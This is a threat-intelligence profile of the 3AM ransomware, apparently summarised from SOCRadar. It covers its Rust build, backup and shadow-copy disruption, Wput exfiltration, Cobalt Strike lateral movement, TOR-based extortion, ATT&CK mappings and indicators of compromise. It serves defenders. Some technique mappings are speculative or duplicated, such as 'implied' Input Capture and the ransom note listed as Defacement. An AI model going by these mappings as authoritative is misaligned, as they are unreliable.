Threat Research

Dark Web Profile: 3AM Ransomware – SOCRadar® Cyber Intelligence Inc.

SocRadar

3AM Ransomware emerged in late 2023 as a Rust-built, 64-bit ransomware used as a fallback option when deploying LockBit failed, and it disrupts backups and security tools while encrypting targeted files with a “.threeamtime” extension. It has alleged ties to larger threat actors (Conti and Royal) and leverages TOR and other techniques for data exfiltration and extortion.
#3AMRansomware #LockBit #Conti #RoyalRansomware #Wput #CobaltStrike #TOR #USBasedCompanies #NATO

Keypoints

  • 3AM Ransomware is Rust-based, targets security/backup services, and renames encrypted files with a “.threeamtime” extension while attempting to delete Volume Shadow Copies.
  • Initial activity includes policy discovery with gpresult and extensive reconnaissance using commands like whoami, netstat, quser, and net share.
  • Exfiltration is performed using the Wput FTP client before encryption, indicating a data theft phase prior to ransom demands.
  • Attackers used Cobalt Strike for lateral movement and leveraged SMB/Windows Admin Shares for propagation within networks.
  • TOR is used for ransom negotiations and command-and-control communications, including a dedicated TOR portal for victims.
  • Leak site activity shows around 23 victims, with a majority US-based and additional victims from NATO-aligned countries; data leaks are published on their site.
  • Security researchers link 3AM to Conti and the Royal ransomware gangs, including use of social media bots to publicize data leaks.

MITRE Techniques

  • [T1053] Scheduled Task/Job – Potentially used by 3AM for execution of ransomware or maintaining persistence in the system. ‘Potentially used by 3AM for execution of ransomware or maintaining persistence in the system.’
  • [T1082] System Information Discovery – ‘gpresult’ and other commands to gather information and potentially evade defenses based on system configs. ‘uses “gpresult” and other commands to gather information and potentially evade defenses based on system configs.’
  • [T1140] Deobfuscate/Decode Files or Information – ‘Could be implied in the encryption process or in how it handles the deletion of Volume Shadow Copies.’
  • [T1490] Inhibit System Recovery – ‘Specifically targets backup systems and Volume Shadow Copies to hinder recovery efforts.’
  • [T1082] System Information Discovery – ‘reconnaissance commands like “whoami,” “netstat,” “quser,” to discover network and server information.’
  • [T1083] File and Directory Discovery – ‘Implied through the encryption process targeting specific files.’
  • [T1518] Software Discovery – ‘Targeting and disabling security services from well-known vendors.’
  • [T1021] Remote Services: SMB/Windows Admin Shares – ‘Lateral movement within the network; uses Cobalt Strike for lateral movement and the Wput tool for data exfiltration.’
  • [T1005] Data from Local System – ‘Data is collected before encryption, including sensitive info.’
  • [T1056] Input Capture – ‘Implied through the collection of sensitive data from the local network.’
  • [T1071] Application Layer Protocol: Web Protocols – ‘Use of TOR for command and control communications.’
  • [T1041] Exfiltration Over C2 Channel – ‘Exfiltrates data to attacker-controlled servers using FTP transfer before encryption.’
  • [T1486] Data Encrypted for Impact – ‘Encrypts files with a “.threeamtime” extension, disrupts backup systems, and deletes Volume Shadow Copies.’
  • [T1491] Defacement – ‘Generating a ransom note in encrypted directories…’
  • [T1499] Endpoint Denial of Service – ‘By encrypting files and possibly disabling critical services, 3AM can cause a denial of service to affected systems.’

Indicators of Compromise

  • [File Extension] Targeted file encryption – example: document.doc.threeamtime, image.png.threeamtime, and 2 more .threeamtime files
  • [File Name] Ransom note – example: RECOVER-FILES, RECOVER-FILES.txt
  • [URL] TOR-based recovery portal – example: http://threeam7[REDACTED].onion/recovery
  • [URL] Onion leak site indicator – example: ThreeAM Onion Leak Site (leaked data published under victim pages)

Read more: https://socradar.io/dark-web-profile-3am-ransomware/